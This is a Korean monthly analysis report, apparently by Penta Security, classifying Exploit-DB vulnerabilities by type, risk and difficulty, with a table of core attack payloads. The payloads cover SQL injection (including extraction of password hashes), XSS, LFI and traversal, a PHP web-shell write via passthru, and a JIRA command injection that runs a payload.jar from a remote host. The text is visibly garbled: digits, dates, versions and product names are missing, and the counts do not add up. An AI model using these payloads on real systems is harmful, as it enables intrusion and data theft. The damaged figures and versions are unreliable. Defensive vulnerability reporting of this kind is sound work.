EDB 분석보고서 (05.0) 05.0.0~05.0.3 Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 05 년 0 월에공개된 Exploit-DB 의분석결과, SQL Injection 공격에대한취약점보고개수가다른취약점과비교하여유난히많았습니다. 세계적으로가장많이사용되고있는 CMS 인 WordPress, 다음으로많이쓰인다고알려진 에서이 SQL Injection 에취약한모습을보여주고있습니다. 내에서는물론특정 에서해당취약점이많이발생되고있으므로 를사용한다면신속히보안패치를적용하여대응하실수있습니다. 다음으로 CMS 에서도역시 SQL Injection 에취약한모습을보이고있습니다. 분석된공격중에는특정파라미터키의배열을조작하여공격에성공하는, 일반적인공격패턴이아닌공격도포함되어있었습니다. 취약점이발견된페이지가관리자페이지로예되므로관련보안패치가나오기전까지해당소스코드의빠른수정이요구됩니다.. 취약점별보고개수취약점 보고개수 Command Injection Directory Traversal File Upload LFI XSS 3 SQL Injection 5 총합계 3 6 4 0 8 6 4 취약점별보고개수 3 5 0 Command Injection Directory Traversal File Upload LFI XSS SQL Injection. 위험도별분류위험도 보고개수 백분율 8 34.78% 중 5 65.% 합계 3 00.00% 위험도별분류 8 5 중 3. 공격난이도별현황공격난이도 보고개수 백분율 7 30.43% 중 7 30.43% 하 9 39.3% 총합계 3 00.00% 9 공격난이도별현황 7 중 하 7 4. 주요소프트웨어별취약점발생현황 소프트웨어이름 보고개수 9 4 ManageEngine ElasticSearch Kerio JIRA Oxwall Dream 총합계 3 주요소프트웨어별취약점발생현황 9 ManageEngine ElasticSearch Kerio JIRA Oxwall Dream 4 ** 5개이발생한주요소프트웨어별취약점세 EDB 번호 취약점종류 공격난이도 공격위험도 취약점이름 소프트웨어이름 38445 SQL Injection Real Estate Manager 3.7 - index.php 3858 XSS 하 중 - index.php XSS 취약점 3857 SQL Injection 하 중 - index.php () 3857 SQL Injection 하 중 - index.php () 3857 SQL Injection 하 중 - index.php (3) 38534 SQL Injection 3..x - 3.4.4 - index.php 38565 SQL Injection 중 중 oomla JNews 8.5. - index.php () 38565 SQL Injection 중 oomla JNews 8.5. - index.php () 38565 SQL Injection 중 중 oomla JNews 8.5. - index.php (3)
날짜 EDB 번호취약점분류공격난이도공격위험도취약점이름핵심공격코드대프로그램대환경 05-0-0 38383 Directory Traversal 하 EDB 분석보고서 (05.0) 05.0.0~05.0.3 Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다. ElasticSearch.6.0 - Directory Traversal 취약점 /_snapshot/pwn/evl/../../../../../../../../ ElasticSearch ElasticSearch.6.0 05-0-05 38395 LFI 중 ManageEngine ServiceDesk Plus - FileDownload.jsp LFI 취약점 /workorder/filedownload.jsp?module=support&fname=.. ManageEngin %f..%f..%f..%f..%f..%f..%fwindows%fwin.in e i%00 ManageEngin e ServiceDesk Plus <= 9. 05-0-06 38406 SQL Injection 중중 <= v7.0.07 - /phpfusion/files/administration/members.php?aid=99ad64 members.php SQL Injection 취약 700ec4ce0&sortby=all&status=0' 점 AND substr(@@version,,)='5 <= v7.0.07 05-0-07 384 XSS 하중 Management Interface 4.3.7 - / XSS 취약점 POST / HTTP/. Management Interface 4.3.7 title:utf-8:string=</title><script>alert('xss by hyp3rlinx 083005')</script>&manage_editProperties:method=Sav e Changes 05-0- 38446 File Upload 하중 Dream CMS.3.0 - /pages/en/files-manageradministration/add-file File Upload 취약점 POST /pages/en/files-manager-administration/addfile?path=home HTTP/. Connection: Close Accept: text/html, application/xhtml+xml, */* Accept-Language: ko-kr User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows NT 6.; WOW64; Trident/6.0) Content-Type: multipart/form-data; boundary=--------------- ------------7dd009908f Dream Dream CMS.3.0 -----------------------------7dd009908f Content-Disposition: form-data; name="file"; filename="billy.php" Content-Type: application/octet-stream <? phpinfo();?> -----------------------------7dd009908f-- 05-0- 38445 SQL Injection POST /index.php?option=com_realestatemanager&task=showca tegory&catid=50&itemid=3 HTTP/. Real Estate Manager 3.7 - index.php SQL Injection 취약점 Real Estate Manager 3.7 order_direction=asc,(select (CASE WHEN (798=798) THEN ELSE 798*(SELECT 798 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&order_field=price 05-0-3 38450 SQL Injection 중중 Kerio Control <= 8.6. - report.php /report.php?id='+or+''%3d''%3b+-- Kerio Kerio Control <= 8.6. 05-0-9 38497 SQL Injection 중중 4.0. - users.php /admin/users.php?req=remove&u_id=03%0and%0(se lect%0*%0from%0(select(sleep(66)))a)--%0& 4.0. 05-0-9 38497 SQL Injection 중중 4.0. - mailer.php POST /admin/mailer.php HTTP/. 4.0. agent[]=0 and (select * from (select(sleep(67)))a)-- &subject=test&message=t00t^^&submit_mailer=send POST /administrator/index.php HTTP/. 05-0-3 3858 XSS 하중 - index.php XSS 취약점 option=com_rpl&view=location_manager&format=ajax&ne w_location_en_gb=%onmousemove%3d%alert()% %&new_location_fr_fr=&level=&parent=&function=ad d_location
EDB 분석보고서 (05.0) 05.0.0~05.0.3 Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다. 날짜 EDB 번호취약점분류공격난이도공격위험도취약점이름핵심공격코드대프로그램대환경 05-0-3 3857 SQL Injection 하중 - index.php SQL Injection 취약점 () POST /administrator/index.php HTTP/. option=com_rpl&view=addon_membership_members&for mat=edit&id=84' and =-- 05-0-3 3857 SQL Injection 하중 - index.php SQL Injection 취약점 () POST /administrator/index.php HTTP/. option=com_rpl&view=rpl_multilingual&format=ajax&func tion=data_copy©_field=308' and =-- ©_from=©_to=en_gb©_method= 05-0-3 3857 SQL Injection 하중 - index.php SQL Injection 취약점 (3) POST /administrator/index.php HTTP/. option=com_rpl&view=property_structure&format=ajax&f unction=update_field&id=300&options=0&css=&tip=&st yle=&name=&cat_id=&text_search=0&plisting=0&pshow =' and =--&pwizard=&mode=add 05-0-6 38534 SQL Injection 3..x - 3.4.4 - index.php /index.php?option=com_contenthistory&view=history&list [ordering]=&item_id=75&type_id=&list[select]=(select+ +from+(select+count(*),+concat((select+(select+concat(p assword))+from+icalab_users+limit+0,),floor(rand(0)*) )x+from+information_schema.tables+group+by+x)a) 3..x - 3.4.4 POST /rest/hipchat/integrations/.0/message/render/ HTTP/. 05-0-8 3855 Command Injection JIRA and HipChat for JIRA Plugin - /rest/hipchat/integrations/.0/m essage/render/ Command injection 취약점 Content-Type: application/json { "message": " $i8n.getclass().forname(\'java.lang.runtime\').getmethod (\'getruntime\', null).invoke(nㅌ ull, null).exec(\'' + java -jar \\\\9.68..34\\public\\payload.jar + '\').waitfor() " } JIRA JIRA product versions: 6.3.5 <= version < 6.4. 05-0-9 38565 SQL Injection 중중 oomla JNews 8.5. - index.php () POST /joomlatest/index.php?option=com_jnews HTTP/. Itemid=88&name=asdf&email=asdf@asdf.com&receive_h tml=0&timezone=00:00:00&confirmed=&subscribed[]= 0&sub_list_id[]= RLIKE (SELECT (CASE WHEN (7097=7097) THEN ELSE 0x8 END))&acc_level[]=9&passwordA=0oYmqypNqP6eU&fr omfrontend=&act=subscribe&subscriber_id=0&user_id= 0&option=com_jnews&task=save&boxchecked=0&Itemid= 88&d65abd4ca0e4f5d3e5af6b5c390ae7= JNews 8.5.
EDB 분석보고서 (05.0) 05.0.0~05.0.3 Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다. 날짜 EDB 번호취약점분류공격난이도공격위험도취약점이름핵심공격코드대프로그램대환경 05-0-9 38565 SQL Injection 중 oomla JNews 8.5. - index.php () POST /joomlatest/index.php?option=com_jnews HTTP/. Itemid=88&name=asdf&email=asdf@asdf.com&receive_h tml=0&timezone=00:00:00&confirmed=&subscribed[]= 0&sub_list_id[]= AND EXTRACTVALUE(8483,CONCAT(0x5c,0x76b78767,(SEL ECT (ELT(8483=8483,))),0x76b786b7))&acc_level[]=9& passworda=0oymqypnqp6eu&fromfrontend=&act=subs cribe&subscriber_id=0&user_id=0&option=com_jnews&tas k=save&boxchecked=0&itemid=88&d65abd4ca0e4f5d3 e5af6b5c390ae7= JNews 8.5. 05-0-9 38565 SQL Injection 중중 oomla JNews 8.5. - index.php (3) POST /joomlatest/index.php?option=com_jnews HTTP/. Itemid=88&name=asdf&email=asdf@asdf.com&receive_h tml=0&timezone=00:00:00&confirmed=&subscribed[]= 0&sub_list_id[]=(SELECT * FROM (SELECT(SLEEP(5)))Qrax)&acc_level[]=9&passwordA=0 oymqypnqp6eu&fromfrontend=&act=subscribe&subscri ber_id=0&user_id=0&option=com_jnews&task=save&boxc hecked=0&itemid=88&d65abd4ca0e4f5d3e5af6b5c390 ae7= JNews 8.5. 05-0-30 3858 XSS 하중 Oxwall.7.4 - /admin/pages/maintenance XSS 취약점 POST /admin/pages/maintenance HTTP/. Oxwall Oxwall.7.4 form_name=maintenance&maintenance_enable=on&save =Save&maintenance_text=<script>alert('ImmuniWeb');</sc ript> 05-0-30 38579 LFI 하중 CMS - admin_editor.php LFI 취약점 POST /pligg-cms-master/admin/admin_editor.php HTTP/. CMS the_file=..%f..%f..%f..%f..%f..%f..%f..%f..%f..%f..%fvar%fwww%fhtml%fpligg-cmsmaster%f404.php&updatedfile=<?php passthru($_get['x']);?>&isempty=&save=save+changes 05-0-30 38577 SQL Injection CMS - story.php SQL Injection 취약점 /pligg-cms-master/story.php?title=googleblabla&reply=&comment_id=%0union%0all%0sele ct%0,,,,,,,password,password,%0from%0m ysql.user%0%3 CMS POST /pligg-cms-master/admin/admin_users.php HTTP/. 05-0-30 38577 SQL Injection CMS - admin_users.php SQL Injection 취약점 CMS frmsubmit=userlist&admin_acction=&token=valid_csrf_ TOKEN&all=on&enabled[ AND IF(SUBSTRING(version(),, )%3D5,BENCHMARK(500000000,version()),null) %3]=
EDB 분석보고서 (05.0) 05.0.0~05.0.3 Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다. 날짜 EDB 번호취약점분류공격난이도공격위험도취약점이름핵심공격코드대프로그램대환경 05-0-30 38577 SQL Injection CMS - upload.php POST /pligg-cms-master/modules/upload/upload.php HTTP/. CMS id=&number=&comment=' AND IF(SUBSTRING(version(),, )%3D5,BENCHMARK(500000000,version()),null) %3